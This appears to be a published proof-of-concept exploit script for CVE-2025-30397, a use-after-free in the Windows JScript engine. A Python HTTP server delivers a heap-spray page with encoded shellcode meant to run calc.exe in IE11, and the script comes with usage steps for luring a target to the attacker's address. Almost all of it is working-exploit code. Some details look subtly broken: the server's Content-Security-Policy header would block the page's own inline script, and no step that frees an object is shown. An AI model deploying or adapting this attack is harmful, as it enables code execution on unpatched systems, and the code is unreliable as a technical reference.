#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) 
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.

# ============================
#  Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
#    $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
#    Open Internet Explorer and navigate to:
#    http://<attacker-ip>:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================

import http.server
import socketserver

PORT = 8080

HTML_CONTENT = b"""<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>PoC - CVE-2025-30397</title>
  <script>
    var payload = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
    while (payload.length < 0x1000) payload += payload;
    var shell = unescape(
      "%u9090%u9090%uebfc%u5eeb%u31b8%u64c9%u8b8b%u3050%u8b0c%u8b70" +
      "%u3c4a%u780c%u4f0a%u4b8b%u1c70%u8b1c%u8b6c%u0c5c%u8b14%u285c" +
      "%uef01%u528b%u8b10%u3c0a%u758b%u1c28%u8b34%u5c6a%u0158%uc985" +
      "%u75c9%u8b58%u8b10%u3c20%u418b%u0348%u408b%u8b34%u1c4a%uc085" +
      "%u7401%u0343%u0c6a%u58eb%ue8d0%uff00%u6361%u6c63%u2e00%u6578" +
      "%u0065"
    );
    var final = payload + shell;
    var buffer = [];
    for (var i = 0; i < 1500; i++) buffer[i] = final.substring(0);
    var sprayTarget = document.createElement("iframe");
    sprayTarget.setAttribute("src", "about:blank");
    document.body.appendChild(sprayTarget);
    for (var i = 0; i < 200; i++) {
      try {
        sprayTarget.contentWindow.eval("var a = '" + final + "'");
      } catch (e) {}
    }
    for (var j = 0; j < 1000; j++) {
      var obj = document.createElement("div");
      obj.innerHTML = "EXPLOIT" + j;
      document.body.appendChild(obj);
    }
    var victim = document.createElement("object");
    victim.setAttribute("classid", "clsid:0002DF01-0000-0000-C000-000000000046");
    document.body.appendChild(victim);
    alert("PoC loaded. If vulnerable, calc.exe will launch.");
  </script>
</head>
<body>
  <h1 style="color:red;">Exploit PoC: CVE-2025-30397</h1>
  <h2>Author: Mohammed Idrees Banyamer</h2>
  <h3>Instagram: <a href="https://instagram.com/mbanyamer" target="_blank">@banyamer_security</a></h3>
  <h3>GitHub: <a href="https://github.com/mbanyamer" target="_blank">mbanyamer</a></h3>
  <p>This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.</p>
</body>
</html>
"""

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.send_header("Content-length", str(len(HTML_CONTENT)))
            self.send_header("X-Content-Type-Options", "nosniff")
            self.send_header("X-Frame-Options", "SAMEORIGIN")
            self.send_header("Content-Security-Policy", "default-src 'self'")
            self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
            self.send_header("Pragma", "no-cache")
            self.send_header("Expires", "0")
            self.end_headers()
            self.wfile.write(HTML_CONTENT)
        else:
            self.send_error(404, "File Not Found")

def run():
    print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\nServer stopped.")

if __name__ == "__main__":
    run()